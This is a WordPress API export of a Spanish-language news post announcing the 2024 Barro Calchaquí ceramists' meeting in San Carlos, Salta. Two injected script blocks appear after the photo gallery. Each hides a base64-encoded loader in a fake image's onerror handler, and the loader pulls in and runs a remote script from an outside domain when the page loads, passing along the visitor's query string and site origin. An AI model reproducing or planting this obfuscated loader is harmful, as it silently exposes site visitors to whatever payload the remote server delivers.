{"id":4186,"date":"2024-07-10T13:58:13","date_gmt":"2024-07-10T16:58:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4186"},"modified":"2025-08-13T23:53:00","modified_gmt":"2025-08-14T02:53:00","slug":"se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4186","title":{"rendered":"Se anunci\u00f3 el lanzamiento de Barro Calchaqu\u00ed en San Carlos"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-dc4bbaacbe8db6b6559d494fe21fa688\" style=\"background-color:#530116\"><em>Con la presencia de autoridades locales y del Gobierno de la Provincia, se anunci\u00f3 el Encuentro Latinoamericano de Ceramistas que se llevar\u00e1 a cabo del 15 al 20 de julio en San Carlos, una de las localidades m\u00e1s importantes de los Valles Calchaqu\u00edes.<\/em><\/h4>\n\n\n\n<p>En la Casa de la Cultura de la Provincia de Salta, el secretario de Cultura,<strong>&nbsp;Diego Ashur<\/strong>,&nbsp;la intendenta de San Carlos,&nbsp;<strong>Cristina Vargas<\/strong>, y el director de Cultura del municipio de San Carlos,&nbsp;<strong>Gast\u00f3n Contreras<\/strong>, anunciaron el Encuentro Latinoamericano de Ceramistas \u201cBarro Calchaqu\u00ed 2024\u201d que tendr\u00e1 lugar en la Localidad de San Carlos, en la plazoleta IV de Noviembre del 15 al 20 de Julio del presente a\u00f1o con entrada libre y gratuita.<\/p>\n\n\n\n<p>Barro Calchaqu\u00ed es un encuentro autogestivo, declarado de inter\u00e9s cultural por la Provincia de Salta y la Naci\u00f3n en sus anteriores ediciones, que tiene al pueblo de San Carlos como referente y cuna de ceramistas de diversas comunidades precolombinas. El encuentro es apuntado a la comunidad en general, fomentando la manifestaci\u00f3n de la diversidad cultural y el patrimonio material e inmaterial de los Valles Calchaqu\u00edes.<\/p>\n\n\n\n<p>En esta edici\u00f3n contar\u00e1 con la participaci\u00f3n de ceramistas de distintos or\u00edgenes y con diversas miradas que trabajar\u00e1n a la par durante una semana a la vista del p\u00fablico.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12934-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos.png\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12934-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos.png\" alt=\"Se anunci\u00f3 el lanzamiento de Barro Calchaqu\u00ed en San Carlos\"\/><\/a><\/figure>\n\n\n\n<p>Al respecto, Diego Ashur manifest\u00f3 \u201cestamos ac\u00e1 para el lanzamiento de uno de los eventos culturales m\u00e1s importantes que tiene la provincia, se trata de nuestra cer\u00e1mica que sin duda logra su mayor exponente a trav\u00e9s de Barro Calchaqu\u00ed, una iniciativa de muchos a\u00f1os que cuenta con el acompa\u00f1amiento de la Municipalidad y de ese espacio emblem\u00e1tico para San Carlos, que es el Museo Jallpha Kalchaki\u201d.<\/p>\n\n\n\n<p>La intendenta de San Carlos, Cristina Vargas, expres\u00f3 que: \u201cDesde la Municipalidad estamos convencidos que existe un sector artesano importante, que expresa nuestra cultura a trav\u00e9s de sus manos y lo que producen a trav\u00e9s de ellas. La participaci\u00f3n que esperamos es internacional, con talleres, exposiciones y la posibilidad de compartir con maestros ceramistas de diferentes provincias y pa\u00edses del 15 al 20 de julio de manera directa, libre y gratuita\u201d.<\/p>\n\n\n\n<p>Asimismo, Gaston Contreras,&nbsp; se\u00f1al\u00f3 que Barro Calchaqu\u00ed data desde la d\u00e9cada de los 90\u2019, que surge como iniciativa del grupo de ceramistas de los Valles Calchaqu\u00edes y se ha consolidado desde entonces gracias al apoyo del Municipio, salte\u00f1os y turistas: \u201cEste encuentro internacional se realiza desde el a\u00f1o 94, gracias a un grupo de ceramistas locales y con los a\u00f1os ha logrado superar las fronteras, contando hoy con participantes de otros pa\u00edses que suman experiencias y diversidad a esta manifestaci\u00f3n del Patrimonio Inmaterial de los salte\u00f1os\u201d.<\/p>\n\n\n\n<p>Las actividades inaugurales tendr\u00e1n lugar el d\u00eda 15 de Julio a las 9 hs que se realizar\u00e1 la apertura, acreditaci\u00f3n y bienvenida a los participantes en la Plaza IV de Noviembre, San Carlos. All\u00ed, se realizar\u00e1 una entrega de arcilla e inicio de los trabajos por parte de los ceramistas invitados que trabajar\u00e1n todos los d\u00edas del encuentro de 10 a 13 hs y de 15 a 18 hs. A partir de &nbsp;las 11 hasta las 19 hs se realizar\u00e1n diversas cl\u00ednicas, conversatorios y seminarios a cargo de Tato Corte (Bah\u00eda Blanca); Gabriela Moleres y Pedro Crispo (Buenos Aires); Cesar Ju\u00e1rez (Peru); y maestras artesanas de la Comunidad Tutiati de Campo Dur\u00e1n; entre otros artesanos.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"960\" height=\"600\" data-id=\"4188\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7406-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos.png\" alt=\"\" class=\"wp-image-4188\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7406-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos.png 960w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7406-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-300x188.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7406-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-768x480.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7406-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-672x420.png 672w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7406-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-696x435.png 696w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"960\" height=\"600\" data-id=\"4189\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7407-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos.png\" alt=\"\" class=\"wp-image-4189\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7407-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos.png 960w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7407-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-300x188.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7407-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-768x480.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7407-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-672x420.png 672w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7407-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-696x435.png 696w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"960\" height=\"600\" data-id=\"4187\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7408-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos.png\" alt=\"\" class=\"wp-image-4187\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7408-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos.png 960w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7408-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-300x188.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7408-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-768x480.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7408-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-672x420.png 672w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/07\/7408-se-anuncio-el-lanzamiento-de-barro-calchaqui-en-san-carlos-696x435.png 696w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con la presencia de autoridades locales y del Gobierno de la Provincia, se anunci\u00f3 el Encuentro Latinoamericano de Ceramistas que se llevar\u00e1 a cabo del 15 al 20 de julio en San Carlos, una de las localidades m\u00e1s importantes de los Valles Calchaqu\u00edes. En la Casa de la Cultura de la Provincia de Salta, el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4190,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,18],"tags":[],"class_list":{"0":"post-4186","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4186"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4186"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4186\/revisions"}],"predecessor-version":[{"id":6744,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4186\/revisions\/6744"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4190"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4186"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4186"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4186"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}